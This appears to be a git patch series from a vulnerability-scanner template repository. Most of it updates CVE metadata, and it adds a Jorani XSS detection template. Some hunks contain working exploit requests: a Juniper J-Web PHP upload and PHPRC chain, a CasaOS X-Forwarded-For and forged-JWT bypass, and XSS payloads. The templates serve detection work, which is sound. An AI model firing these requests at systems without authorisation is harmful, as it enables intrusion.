e812e76b3a..ee50c95d61 100644 --- a/http/cves/2023/CVE-2023-34960.yaml +++ b/http/cves/2023/CVE-2023-34960.yaml @@ -3,16 +3,29 @@ id: CVE-2023-34960 info: name: Chamilo Command Injection author: DhiyaneshDK - severity: high + severity: critical description: | A command injection vulnerability in the wsConvertPpt component of Chamilo v1.11.* up to v1.11.18 allows attackers to execute arbitrary commands via a SOAP API call with a crafted PowerPoint name. reference: - https://sploitus.com/exploit?id=FD666992-20E1-5D83-BA13-67ED38E1B83D - https://github.com/Aituglo/CVE-2023-34960/blob/master/poc.py + - http://chamilo.com + - http://packetstormsecurity.com/files/174314/Chamilo-1.11.18-Command-Injection.html + - https://support.chamilo.org/projects/1/wiki/Security_issues#Issue-112-2023-04-20-Critical-impact-High-risk-Remote-Code-Execution + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H + cvss-score: 9.8 + cve-id: CVE-2023-34960 + cwe-id: CWE-77 + epss-score: 0.81793 + cpe: cpe:2.3:a:chamilo:chamilo:*:*:*:*:*:*:*:* + epss-percentile: 0.97936 metadata: max-request: 1 verified: "true" shodan-query: http.component:"Chamilo" + vendor: chamilo + product: chamilo tags: cve,cve2023,chamilo http: diff --git a/http/cves/2023/CVE-2023-35078.yaml b/http/cves/2023/CVE-2023-35078.yaml index 8b8f78fbec..a4c5834596 100644 --- a/http/cves/2023/CVE-2023-35078.yaml +++ b/http/cves/2023/CVE-2023-35078.yaml @@ -12,16 +12,20 @@ info: - https://www.ivanti.com/blog/cve-2023-35078-new-ivanti-epmm-vulnerability - https://help.ivanti.com/mi/help/en_us/CORE/11.2.0.0/dmgw/DMGfiles/Join_Azure_and_MobileIro.htm classification: - cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H - cvss-score: 10 + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H + cvss-score: 9.8 cve-id: CVE-2023-35078 cwe-id: CWE-287 - epss-score: 0.01976 + epss-score: 0.96524 + cpe: cpe:2.3:a:ivanti:endpoint_manager_mobile:*:*:*:*:*:*:*:* + epss-percentile: 0.99414 metadata: max-request: 1 verified: true fofa-query: icon_hash="362091310" shodan-query: http.favicon.hash:362091310 + vendor: ivanti + product: endpoint_manager_mobile tags: cve,cve2023,kev,ivanti,mobileiron,epmm http: diff --git a/http/cves/2023/CVE-2023-35082.yaml b/http/cves/2023/CVE-2023-35082.yaml index 3ccd77e09b..7c98abdb46 100644 --- a/http/cves/2023/CVE-2023-35082.yaml +++ b/http/cves/2023/CVE-2023-35082.yaml @@ -6,16 +6,26 @@ info: severity: critical description: | Ivanti Endpoint Manager Mobile (EPMM), formerly MobileIron Core, Since CVE-2023-35082 arises from the same place as CVE-2023-35078, specifically the permissive nature of certain entries in the mifs web application’s security filter chain. - remediation: Upgrading to the latest version of Ivanti Endpoint Manager Mobile (EPMM) reference: - https://www.rapid7.com/blog/post/2023/08/02/cve-2023-35082-mobileiron-core-unauthenticated-api-access-vulnerability/ - https://nvd.nist.gov/vuln/detail/CVE-2023-35082 - https://forums.ivanti.com/s/article/CVE-2023-35082-Remote-Unauthenticated-API-Access-Vulnerability-in-MobileIron-Core-11-2-and-older?language=en_US + remediation: Upgrading to the latest version of Ivanti Endpoint Manager Mobile (EPMM) + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H + cvss-score: 9.8 + cve-id: CVE-2023-35082 + cwe-id: CWE-287 + epss-score: 0.52767 + cpe: cpe:2.3:a:ivanti:endpoint_manager_mobile:*:*:*:*:*:*:*:* + epss-percentile: 0.97143 metadata: max-request: 1 verified: true fofa-query: icon_hash="362091310" shodan-query: http.favicon.hash:362091310 + vendor: ivanti + product: endpoint_manager_mobile tags: cve,cve2023,ivanti,mobileiron,epmm http: diff --git a/http/cves/2023/CVE-2023-35843.yaml b/http/cves/2023/CVE-2023-35843.yaml index 3a3df8b826..d01b56dfed 100644 --- a/http/cves/2023/CVE-2023-35843.yaml +++ b/http/cves/2023/CVE-2023-35843.yaml @@ -18,6 +18,7 @@ info: cwe-id: CWE-22 epss-score: 0.01632 cpe: cpe:2.3:a:nocodb:nocodb:*:*:*:*:*:*:*:* + epss-percentile: 0.85943 metadata: max-request: 1 verified: true diff --git a/http/cves/2023/CVE-2023-35844.yaml b/http/cves/2023/CVE-2023-35844.yaml index 99cab87443..e9b4132ddf 100644 --- a/http/cves/2023/CVE-2023-35844.yaml +++ b/http/cves/2023/CVE-2023-35844.yaml @@ -22,6 +22,7 @@ info: cwe-id: CWE-22 epss-score: 0.00499 cpe: cpe:2.3:a:lightdash:lightdash:*:*:*:*:*:*:*:* + epss-percentile: 0.73306 metadata: max-request: 1 shodan-query: title:"Lightdash" diff --git a/http/cves/2023/CVE-2023-35885.yaml b/http/cves/2023/CVE-2023-35885.yaml index aa35b61d42..5784323065 100644 --- a/http/cves/2023/CVE-2023-35885.yaml +++ b/http/cves/2023/CVE-2023-35885.yaml @@ -16,8 +16,9 @@ info: cvss-score: 9.8 cve-id: CVE-2023-35885 cwe-id: CWE-565 + epss-score: 0.01968 cpe: cpe:2.3:a:mgt-commerce:cloudpanel:*:*:*:*:*:*:*:* - epss-score: 0.00063 + epss-percentile: 0.87262 metadata: max-request: 5 product: cloudpanel @@ -25,7 +26,6 @@ info: vendor: mgt-commerce verified: true tags: cve,cve2023,cloudpanel,rce,instrusive - variables: session: "ZGVmNTAyMDA3ZDI0OGNjZmU0NTVkMGQ2NmJhMjUxYjdhYzg0NzcyYzBmNjM0ODg0ODY0OWYyZTQ0MjgwZDVjZDBjNmY3MWJiZWU4ZTM4OTU4ZmE4YjViNjE4MGJiZjQ4NzA3MzcwNTJiNzFhM2JjYTBmNTdiODQ4ZDZjYjhiNmY1N2U3YTM1YWY3YjA3MTM1ZTlkYjViMjY5OTkzM2Q3NTAyOWI0ZGQ5ZDZmOTFhYTVlZTRhZjg0ZTBmZTU5NjY4NGI4OGU0NjVkNDU4MWYxOTc2MGNiMGI0ZGY2MmZjM2RkMmI4N2RhMzJkYTU4NjNjMWFmMGZlOWIwZjcyZGRkNmFhYzk3ZGVlZmY=" str1: "{{rand_base(10)}}" diff --git a/http/cves/2023/CVE-2023-36287.yaml b/http/cves/2023/CVE-2023-36287.yaml index 1c2f563c09..ddd254e673 100644 --- a/http/cves/2023/CVE-2023-36287.yaml +++ b/http/cves/2023/CVE-2023-36287.yaml @@ -15,8 +15,9 @@ info: cvss-score: 6.1 cve-id: CVE-2023-36287 cwe-id: CWE-79 - epss-score: 0.00118 + epss-score: 0.00077 cpe: cpe:2.3:a:webkul:qloapps:1.6.0:*:*:*:*:*:*:* + epss-percentile: 0.31522 metadata: max-request: 1 verified: "true" diff --git a/http/cves/2023/CVE-2023-36289.yaml b/http/cves/2023/CVE-2023-36289.yaml index 08a9ef6d35..af231498d5 100644 --- a/http/cves/2023/CVE-2023-36289.yaml +++ b/http/cves/2023/CVE-2023-36289.yaml @@ -15,8 +15,9 @@ info: cvss-score: 6.1 cve-id: CVE-2023-36289 cwe-id: CWE-79 - epss-score: 0.00118 + epss-score: 0.00077 cpe: cpe:2.3:a:webkul:qloapps:1.6.0:*:*:*:*:*:*:* + epss-percentile: 0.31522 metadata: max-request: 1 verified: "true" diff --git a/http/cves/2023/CVE-2023-36346.yaml b/http/cves/2023/CVE-2023-36346.yaml index 737fba13d8..ad1b8710de 100644 --- a/http/cves/2023/CVE-2023-36346.yaml +++ b/http/cves/2023/CVE-2023-36346.yaml @@ -18,6 +18,7 @@ info: cwe-id: CWE-79 epss-score: 0.00075 cpe: cpe:2.3:a:codekop:codekop:2.0:*:*:*:*:*:*:* + epss-percentile: 0.30622 metadata: max-request: 1 verified: "true" diff --git a/http/cves/2023/CVE-2023-36844.yaml b/http/cves/2023/CVE-2023-36844.yaml index 18b98f642e..fe19e6052a 100644 --- a/http/cves/2023/CVE-2023-36844.yaml +++ b/http/cves/2023/CVE-2023-36844.yaml @@ -3,20 +3,22 @@ id: CVE-2023-36844 info: name: Juniper Devices - Remote Code Execution author: princechaddha,ritikchaddha - severity: critical + severity: medium description: | Multiple cves in Juniper Network (CVE-2023-36844|CVE-2023-36845|CVE-2023-36846|CVE-2023-36847).A PHP External Variable Modification vulnerability in J-Web of Juniper Networks Junos OS on EX Series allows an unauthenticated, network-based attacker to control certain, important environments variables. Utilizing a crafted request an attacker is able to modify certain PHP environments variables leading to partial loss of integrity, which may allow chaining to other vulnerabilities. reference: - https://labs.watchtowr.com/cve-2023-36844-and-friends-rce-in-juniper-firewalls/ - https://github.com/watchtowrlabs/juniper-rce_cve-2023-36844 - https://supportportal.juniper.net/JSA72300 + - http://packetstormsecurity.com/files/174397/Juniper-JunOS-SRX-EX-Remote-Code-Execution.html classification: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:L/A:N cvss-score: 5.3 - cve-id: CVE-2023-36844|CVE-2023-36845|CVE-2023-36846|CVE-2023-36847 + cve-id: CVE-2023-36844 cwe-id: CWE-473 - epss-score: 0.00046 + epss-score: 0.02371 cpe: cpe:2.3:o:juniper:junos:*:*:*:*:*:*:*:* + epss-percentile: 0.88443 metadata: max-request: 3 verified: true @@ -24,7 +26,6 @@ info: vendor: juniper product: junos tags: cve,cve2023,juniper,php,rce,intrusive,fileupload - variables: value: "CVE-2023-36844" payload: "('')" @@ -37,14 +38,12 @@ http: Content-Type: application/x-www-form-urlencoded rs=do_upload&rsargs[]=[{"fileData": "data:text/html;base64,{{base64(payload)}}", "fileName": "{{rand_base(5, "abc")}}.php", "csize": {{len(payload)}}}] - - | POST /webauth_operation.php HTTP/1.1 Host: {{Hostname}} Content-Type: application/x-www-form-urlencoded rs=do_upload&rsargs[]=[{"fileName": "{{rand_base(5, "abc")}}.ini", "fileData": "data:text/html;base64,{{base64(concat('auto_prepend_file=',hex_decode('22'),'/var/tmp/',phpfile,hex_decode('22')))}}", "csize": "97" }] - - | GET /webauth_operation.php?PHPRC=/var/tmp/{{inifile}} HTTP/1.1 Host: {{Hostname}} diff --git a/http/cves/2023/CVE-2023-36934.yaml b/http/cves/2023/CVE-2023-36934.yaml index 53c97f6f52..c4847536d0 100644 --- a/http/cves/2023/CVE-2023-36934.yaml +++ b/http/cves/2023/CVE-2023-36934.yaml @@ -16,8 +16,9 @@ info: cvss-score: 9.1 cve-id: CVE-2023-36934 cwe-id: CWE-89 - epss-score: 0.01286 + epss-score: 0.15657 cpe: cpe:2.3:a:progress:moveit_transfer:*:*:*:*:*:*:*:* + epss-percentile: 0.95206 metadata: max-request: 4 product: moveit_transfer diff --git a/http/cves/2023/CVE-2023-37265.yaml b/http/cves/2023/CVE-2023-37265.yaml index 112bb29cc6..d4cc0dc545 100644 --- a/http/cves/2023/CVE-2023-37265.yaml +++ b/http/cves/2023/CVE-2023-37265.yaml @@ -6,20 +6,27 @@ info: severity: critical description: | CasaOS is an open-source Personal Cloud system. Due to a lack of IP address verification an unauthenticated attackers can execute arbitrary commands as `root` on CasaOS instances. The problem was addressed by improving the detection of client IP addresses in `391dd7f`. This patch is part of CasaOS 0.4.4. Users should upgrade to CasaOS 0.4.4. If they can't, they should temporarily restrict access to CasaOS to untrusted users, for instance by not exposing it publicly. - remediation: The problem was addressed by improving the detection of client IP addresses in 391dd7f. This patch is part of CasaOS 0.4.4. reference: - https://github.com/IceWhaleTech/CasaOS/commit/705bf1facbffd2ca40b159b0303132b6fdf657ad - https://github.com/IceWhaleTech/CasaOS/security/advisories/GHSA-m5q5-8mfw-p2hr + - https://github.com/IceWhaleTech/CasaOS-Gateway/commit/391dd7f0f239020c46bf057cfa25f82031fc15f7 + - https://github.com/IceWhaleTech/CasaOS-Gateway/security/advisories/GHSA-vjh7-5r6x-xh6g + remediation: The problem was addressed by improving the detection of client IP addresses in 391dd7f. This patch is part of CasaOS 0.4.4. classification: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H cvss-score: 9.8 + cve-id: CVE-2023-37265 cwe-id: CWE-306 - epss-score: 0.00044 + epss-score: 0.1326 + cpe: cpe:2.3:o:icewhale:casaos:*:*:*:*:*:*:*:* + epss-percentile: 0.94837 metadata: verified: true max-request: 1 fofa-query: body="/CasaOS-UI/public/index.html" shodan-query: http.html:"/CasaOS-UI/public/index.html" + vendor: icewhale + product: casaos tags: cve,cve2023,oss,casaos,jwt http: @@ -29,7 +36,6 @@ http: headers: X-Forwarded-For: 127.0.0.1 - matchers: - type: word words: diff --git a/http/cves/2023/CVE-2023-37266.yaml b/http/cves/2023/CVE-2023-37266.yaml index 7edd58ac71..91b14cf0aa 100644 --- a/http/cves/2023/CVE-2023-37266.yaml +++ b/http/cves/2023/CVE-2023-37266.yaml @@ -6,22 +6,26 @@ info: severity: critical description: | CasaOS is an open-source Personal Cloud system. Unauthenticated attackers can craft arbitrary JWTs and access features that usually require authentication and execute arbitrary commands as `root` on CasaOS instances. This problem was addressed by improving the validation of JWTs in commit `705bf1f`. This patch is part of CasaOS 0.4.4. Users should upgrade to CasaOS 0.4.4. If they can't, they should temporarily restrict access to CasaOS to untrusted users, for instance by not exposing it publicly. - remediation: The problem was addressed by improving the validation of JWTs in 705bf1f. This patch is part of CasaOS 0.4.4. reference: - https://github.com/IceWhaleTech/CasaOS/commit/705bf1facbffd2ca40b159b0303132b6fdf657ad - https://github.com/IceWhaleTech/CasaOS/security/advisories/GHSA-m5q5-8mfw-p2hr + remediation: The problem was addressed by improving the validation of JWTs in 705bf1f. This patch is part of CasaOS 0.4.4. classification: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H cvss-score: 9.8 + cve-id: CVE-2023-37266 cwe-id: CWE-287 - epss-score: 0.00044 + epss-score: 0.06744 + cpe: cpe:2.3:o:icewhale:casaos:*:*:*:*:*:*:*:* + epss-percentile: 0.92955 metadata: verified: true max-request: 1 fofa-query: body="/CasaOS-UI/public/index.html" shodan-query: http.html:"/CasaOS-UI/public/index.html" + vendor: icewhale + product: casaos tags: cve,cve2023,oss,casaos,jwt - variables: jwt_data: '{"iss":"casaos","exp":1790210322,"nbf":1790199522,"iat":1790199522}' jwt_token: '{{generate_jwt(jwt_data, "HS256")}}' @@ -33,7 +37,6 @@ http: headers: Authorization: '{{jwt_token}}' - matchers: - type: word words: diff --git a/http/cves/2023/CVE-2023-37270.yaml b/http/cves/2023/CVE-2023-37270.yaml index f7cb519a22..ddbc19368e 100644 --- a/http/cves/2023/CVE-2023-37270.yaml +++ b/http/cves/2023/CVE-2023-37270.yaml @@ -9,15 +9,23 @@ info: reference: - https://github.com/Piwigo/Piwigo/security/advisories/GHSA-934w-qj9p-3qcx - https://nvd.nist.gov/vuln/detail/CVE-2023-27524 + - https://github.com/Piwigo/Piwigo/blob/c01ec38bc43f09424a8d404719c35f963d63cf00/include/dblayer/functions_mysqli.inc.php#L491 + - https://github.com/Piwigo/Piwigo/blob/c01ec38bc43f09424a8d404719c35f963d63cf00/include/functions.inc.php#L621 + - https://github.com/Piwigo/Piwigo/commit/978425527d6c113887f845d75cf982bbb62d761a classification: - cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:L/A:L - cvss-score: 7.6 + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H + cvss-score: 8.8 cve-id: CVE-2023-37270 cwe-id: CWE-89 + epss-score: 0.01274 + cpe: cpe:2.3:a:piwigo:piwigo:*:*:*:*:*:*:*:* + epss-percentile: 0.83984 metadata: max-request: 2 verified: true shodan-query: http.favicon.hash:540706145 + vendor: piwigo + product: piwigo tags: cve,cve2023,piwigo,sqli,authenticated http: @@ -29,13 +37,13 @@ http: Content-Type: application/x-www-form-urlencoded username={{username}}&password={{password}}&login= - - | GET /admin.php?page=user_activity HTTP/1.1 Host: {{Hostname}} host-redirects: true cookie-reuse: true + matchers-condition: and matchers: - type: word diff --git a/http/cves/2023/CVE-2023-37462.yaml b/http/cves/2023/CVE-2023-37462.yaml index 07acff7b9c..4382350d69 100644 --- a/http/cves/2023/CVE-2023-37462.yaml +++ b/http/cves/2023/CVE-2023-37462.yaml @@ -3,24 +3,29 @@ id: CVE-2023-37462 info: name: XWiki Platform - Remote Code Execution author: parthmalhotra,pdresearch - severity: critical + severity: high description: | XWiki Platform is a generic wiki platform offering runtime services for applications built on top of it. Improper escaping in the document `SkinsCode.XWikiSkinsSheet` leads to an injection vector from view right on that document to programming rights, or in other words, it is possible to execute arbitrary script macros including Groovy and Python macros that allow remote code execution including unrestricted read and write access to all wiki contents. The attack works by opening a non-existing page with a name crafted to contain a dangerous payload. It is possible to check if an existing installation is vulnerable - remediation: This issue has been patched in XWiki 14.4.8, 14.10.4 and 15.0-rc-1. Users are advised to upgrade. reference: - https://github.com/xwiki/xwiki-platform/commit/d9c88ddc4c0c78fa534bd33237e95dea66003d29 - https://github.com/xwiki/xwiki-platform/security/advisories/GHSA-h4vp-69r8-gvjg - https://jira.xwiki.org/browse/XWIKI-20457 + remediation: This issue has been patched in XWiki 14.4.8, 14.10.4 and 15.0-rc-1. Users are advised to upgrade. classification: - cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:C/C:H/I:H/A:H - cvss-score: 9.9 + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H + cvss-score: 8.8 cve-id: CVE-2023-37462 - cwe-id: CWE-74,CWE-95 + cwe-id: CWE-74 + epss-score: 0.36071 + cpe: cpe:2.3:a:xwiki:xwiki:*:*:*:*:*:*:*:* + epss-percentile: 0.96614 metadata: max-request: 2 verified: true shodan-query: html:"data-xwiki-reference" fofa-query: body="data-xwiki-reference" + vendor: xwiki + product: xwiki tags: cve,cve2023,xwiki,rce http: @@ -31,6 +36,7 @@ http: cookie-reuse: true skip-variables-check: true + extractors: - type: regex group: 1 @@ -45,7 +51,6 @@ http: regex: - HTTP/1.1 Host: {{Hostname}} cookie-reuse: true + matchers-condition: and matchers: - type: word diff --git a/http/cves/2023/CVE-2023-4173.yaml b/http/cves/2023/CVE-2023-4173.yaml index cc2d20eb1d..516ada97b8 100644 --- a/http/cves/2023/CVE-2023-4173.yaml +++ b/http/cves/2023/CVE-2023-4173.yaml @@ -4,28 +4,34 @@ info: name: mooSocial 3.1.8 - Reflected XSS author: momika233 severity: medium - description: > + description: | A vulnerability, which was classified as problematic, was found in mooSocial mooStore 3.1.6. Affected is an unknown function of the file /search/index. reference: - https://www.exploit-db.com/exploits/51670 - https://nvd.nist.gov/vuln/detail/CVE-2023-4173 - http://packetstormsecurity.com/files/174016/mooSocial-3.1.8-Cross-Site-Scripting.html + - https://vuldb.com/?ctiid.236208 + - https://vuldb.com/?id.236208 classification: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N cvss-score: 6.1 - cwe-id: CVE-2023-4173 + cve-id: CVE-2023-4173 + cwe-id: CWE-79 + epss-score: 0.00176 + cpe: cpe:2.3:a:moosocial:moostore:3.1.6:*:*:*:*:*:*:* + epss-percentile: 0.54027 metadata: max-request: 1 verified: true fofa-query: mooSocial - tags: cve,cve2023,moosocial,xss - + vendor: moosocial + product: moostore + tags: packetstorm,cve,cve2023,moosocial,xss http: - method: GET path: - - "{{BaseURL}}/classified/%22%3E%3Cimg%20src=a%20onerror=alert('document.\ - domain')%3E/search?category=1" + - "{{BaseURL}}/classified/%22%3E%3Cimg%20src=a%20onerror=alert('document.domain')%3E/search?category=1" matchers-condition: and matchers: diff --git a/http/cves/2023/CVE-2023-4174.yaml b/http/cves/2023/CVE-2023-4174.yaml index 28c8f14bf4..3d53c5ecba 100644 --- a/http/cves/2023/CVE-2023-4174.yaml +++ b/http/cves/2023/CVE-2023-4174.yaml @@ -10,11 +10,23 @@ info: - https://www.exploit-db.com/exploits/51671 - https://nvd.nist.gov/vuln/detail/CVE-2023-4174 - https://packetstormsecurity.com/files/174017/Social-Commerce-3.1.6-Cross-Site-Scripting.html + - https://vuldb.com/?ctiid.236209 + - https://vuldb.com/?id.236209 + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N + cvss-score: 6.1 + cve-id: CVE-2023-4174 + cwe-id: CWE-79 + epss-score: 0.00209 + cpe: cpe:2.3:a:moosocial:moostore:3.1.6:*:*:*:*:*:*:* + epss-percentile: 0.58186 metadata: max-request: 5 verified: true fofa-query: icon_hash="702863115" - tags: cve,cve2023,moosocial,xss + vendor: moosocial + product: moostore + tags: packetstorm,cve,cve2023,moosocial,xss http: - method: GET @@ -26,6 +38,7 @@ http: - '{{BaseURL}}/classifieds">ridxm/search?category=1' stop-at-first-match: true + matchers-condition: and matchers: - type: word @@ -38,4 +51,4 @@ http: - type: word part: header words: - - "text/html" \ No newline at end of file + - "text/html" From 474ee5baf4f8881f4f4e0cf75ad1b12fe9fc03a9 Mon Sep 17 00:00:00 2001 From: Ritik Chaddha <44563978+ritikchaddha@users.noreply.github.com> Date: Thu, 31 Aug 2023 21:13:46 +0530 Subject: [PATCH 0037/1090] Create CVE-2018-15917.yaml --- http/cves/2018/CVE-2018-15917.yaml | 50 ++++++++++++++++++++++++++++++ 1 file changed, 50 insertions(+) create mode 100644 http/cves/2018/CVE-2018-15917.yaml diff --git a/http/cves/2018/CVE-2018-15917.yaml b/http/cves/2018/CVE-2018-15917.yaml new file mode 100644 index 0000000000..0cee8304d1 --- /dev/null +++ b/http/cves/2018/CVE-2018-15917.yaml @@ -0,0 +1,50 @@ +id: CVE-2018-15917 + +info: + name: Jorani Leave Management System 0.6.5 - Cross-Site Scripting + author: ritikchaddha + severity: medium + description: | + Persistent cross-site scripting (XSS) issues in Jorani 0.6.5 allow remote attackers to inject arbitrary web script or HTML via the language parameter to session/language. + reference: + - https://www.exploit-db.com/exploits/45338 + - https://nvd.nist.gov/vuln/detail/CVE-2018-15917 + classification: + cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:L/UI:R/S:C/C:L/I:L/A:N + cvss-score: 5.4 + cve-id: CVE-2018-15917 + cwe-id: CWE-79 + metadata: + max-request: 2 + verified: true + shodan-query: title:"Login - Jorani" + tags: cve,cve2018,jorani,xss + +http: + - raw: + - | + GET /session/language?last_page=session%2Flogin&language=en%22%3E%3Cscript%3Ealert(document.domain)%3C%2Fscript%3E&login=&CipheredValue= HTTP/1.1 + Host: {{Hostname}} + + - | + GET /session/login HTTP/1.1 + Host: {{Hostname}} + + cookie-reuse: true + matchers-condition: and + matchers: + - type: word + part: body + words: + - '' + - '_jorani' + condition: and + + - type: word + part: header + words: + - text/html + + - type: status + status: + - 200 From bd82733d503da504a9efdf21db8ac962e925aaf2 Mon Sep 17 00:00:00 2001 From: GitHub Action Date: Thu, 31 Aug 2023 15:52:35 +0000 Subject: [PATCH 0038/1090] Auto Generated New Template Addition List [Thu Aug 31 15:52:35 UTC 2023] :robot: --- .new-additions | 1 + 1 file changed, 1 insertion(+) diff --git a/.new-additions b/.new-additions index 4842155e80..78570d1c2e 100644 --- a/.new-additions +++ b/.new-additions @@ -8,6 +8,7 @@ http/cves/2023/CVE-2023-27034.yaml http/cves/2023/CVE-2023-30150.yaml http/cves/2023/CVE-2023-32563.yaml http/cves/2023/CVE-2023-34124.yaml +http/cves/2023/CVE-2023-34192.yaml http/cves/2023/CVE-2023-36844.yaml http/exposed-panels/aspcms-backend-panel.yaml http/exposed-panels/greenbone-panel.yaml From 074dbe22ef1115a5a5187dc678df3a5903ecec5f Mon Sep 17 00:00:00 2001 From: GitHub Action Date: Thu, 31 Aug 2023 15:52:51 +0000 Subject: [PATCH 0039/1090] Auto Generated Templates Checksum [Thu Aug 31 15:52:51 UTC 2023] :robot: --- templates-checksum.txt | 3 ++- 1 file changed, 2 insertions(+), 1 deletion(-) diff --git a/templates-checksum.txt b/templates-checksum.txt index 146ee08a5f..108c3533a9 100644 --- a/templates-checksum.txt +++ b/templates-checksum.txt @@ -2591,6 +2591,7 @@ http/cves/2023/CVE-2023-3345.yaml:81aa4e514ec7e42c0c04e9525c0a07dc2023e301 http/cves/2023/CVE-2023-33510.yaml:2c13c6f56ab0416bdd7e53d28814a6f565302605 http/cves/2023/CVE-2023-33568.yaml:eb301b833721e18854829e2af5f33287788bd00e http/cves/2023/CVE-2023-34124.yaml:bb268f4fb1c4909a6897e8275b1f5f60fcb8886f +http/cves/2023/CVE-2023-34192.yaml:3492af7485b11f827328fc0bf36ed42654b4eaa9 http/cves/2023/CVE-2023-34362.yaml:c3e8ebce7d7e6d851ee37989c43faa13f3fb8c82 http/cves/2023/CVE-2023-34537.yaml:961d0827d05c1234d0e00da2ed0ae49f08d0d9de http/cves/2023/CVE-2023-34598.yaml:e6d11470360f77660a6b9751e2a68c368fc03d29 @@ -7028,7 +7029,7 @@ ssl/ssl-dns-names.yaml:129f54a4e678dde99ca1879ca39a34cd892394ed ssl/tls-version.yaml:cde833d5e6578a1c2e2a6a21e4f38da30d6cf750 ssl/untrusted-root-certificate.yaml:207afac20c036cab562f9b10d469cf709cf977f0 ssl/weak-cipher-suites.yaml:e7d7e428b783106eb31b3e06736dad670d5c669e -templates-checksum.txt:b3331acaaf83635e0a2917f1d34fac12751dc777 +templates-checksum.txt:62440b663c7439c29890cef47623131debd207b6 wappalyzer-mapping.yml:7f03bd65baacac20c1dc6bbf35ff2407959574f1 workflows/74cms-workflow.yaml:a6732eab4577f5dcf07eab6cf5f9c683fea75b7c workflows/acrolinx-workflow.yaml:ae86220e8743583a24dc5d81c8a83fa01deb157f From 047ecaa915f99daa584eea66c2925e202d87196c Mon Sep 17 00:00:00 2001 From: GitHub Action Date: Thu, 31 Aug 2023 15:54:09 +0000 Subject: [PATCH 0040/1090] TemplateMan Update [Thu Aug 31 15:54:09 UTC 2023] :robot: --- http/cves/2023/CVE-2023-34192.yaml | 4 ++-- 1 file changed, 2 insertions(+), 2 deletions(-) diff --git a/http/cves/2023/CVE-2023-34192.yaml b/http/cves/2023/CVE-2023-34192.yaml index 851c5d6d00..d497b6c3e9 100644 --- a/http/cves/2023/CVE-2023-34192.yaml +++ b/http/cves/2023/CVE-2023-34192.yaml @@ -13,9 +13,9 @@ info: classification: cve-id: CVE-2023-34192 metadata: - max-request: 1 - shodan-query: http.favicon.hash:475145467 fofa-query: icon_hash="475145467" + max-request: 2 + shodan-query: http.favicon.hash:475145467 tags: cve,cve2023,zimbra,xss,authenticated http: From c1b56ad7282058acfa9c4be1e879a6e5e27f1bca Mon Sep 17 00:00:00 2001 From: GitHub Action Date: Thu, 31 Aug 2023 15:55:17 +0000 Subject: [PATCH 0041/1090] Auto Generated Templates Checksum [Thu Aug 31 15:55:17 UTC 2023] :robot: --- templates-checksum.txt | 5 +++-- 1 file changed, 3 insertions(+), 2 deletions(-) diff --git a/templates-checksum.txt b/templates-checksum.txt index 108c3533a9..825b0008e3 100644 --- a/templates-checksum.txt +++ b/templates-checksum.txt @@ -1120,6 +1120,7 @@ http/cves/2018/CVE-2018-15138.yaml:36f31a268f34ecb7d3bc9dbb8780a3331a0a85a0 http/cves/2018/CVE-2018-15517.yaml:630aa932c228a3d5ab7535ce105b7221c784375f http/cves/2018/CVE-2018-15535.yaml:5a976b8f0b17f4042a90bde5f49012c04bd0ee9a http/cves/2018/CVE-2018-15745.yaml:367ddf7a4c089a1476fe48716e69e9b0e8594190 +http/cves/2018/CVE-2018-15917.yaml:ea9408feec6802710f83f0e55caeec4aa7652fb9 http/cves/2018/CVE-2018-15961.yaml:cb650b9eb6d6106d7fdd8ee6d9caf616396c0339 http/cves/2018/CVE-2018-16059.yaml:346b58eb5f9f9828c0a43fe5de951bef08d6f84e http/cves/2018/CVE-2018-16133.yaml:887665262f6debceddc70e7f66ca2bb21a791555 @@ -2591,7 +2592,7 @@ http/cves/2023/CVE-2023-3345.yaml:81aa4e514ec7e42c0c04e9525c0a07dc2023e301 http/cves/2023/CVE-2023-33510.yaml:2c13c6f56ab0416bdd7e53d28814a6f565302605 http/cves/2023/CVE-2023-33568.yaml:eb301b833721e18854829e2af5f33287788bd00e http/cves/2023/CVE-2023-34124.yaml:bb268f4fb1c4909a6897e8275b1f5f60fcb8886f -http/cves/2023/CVE-2023-34192.yaml:3492af7485b11f827328fc0bf36ed42654b4eaa9 +http/cves/2023/CVE-2023-34192.yaml:8affac232592b125b819252a29ac21b5e6f40b05 http/cves/2023/CVE-2023-34362.yaml:c3e8ebce7d7e6d851ee37989c43faa13f3fb8c82 http/cves/2023/CVE-2023-34537.yaml:961d0827d05c1234d0e00da2ed0ae49f08d0d9de http/cves/2023/CVE-2023-34598.yaml:e6d11470360f77660a6b9751e2a68c368fc03d29 @@ -7029,7 +7030,7 @@ ssl/ssl-dns-names.yaml:129f54a4e678dde99ca1879ca39a34cd892394ed ssl/tls-version.yaml:cde833d5e6578a1c2e2a6a21e4f38da30d6cf750 ssl/untrusted-root-certificate.yaml:207afac20c036cab562f9b10d469cf709cf977f0 ssl/weak-cipher-suites.yaml:e7d7e428b783106eb31b3e06736dad670d5c669e -templates-checksum.txt:62440b663c7439c29890cef47623131debd207b6 +templates-checksum.txt:d870019ea88cbf135ce6da5ba999cc09d4894bba wappalyzer-mapping.yml:7f03bd65baacac20c1dc6bbf35ff2407959574f1 workflows/74cms-workflow.yaml:a6732eab4577f5dcf07eab6cf5f9c683fea75b7c workflows/acrolinx-workflow.yaml:ae86220e8743583a24dc5d81c8a83fa01deb157f From 3b74f3747d9a70705bd2b449aac417b181ceb941 Mon Sep 17 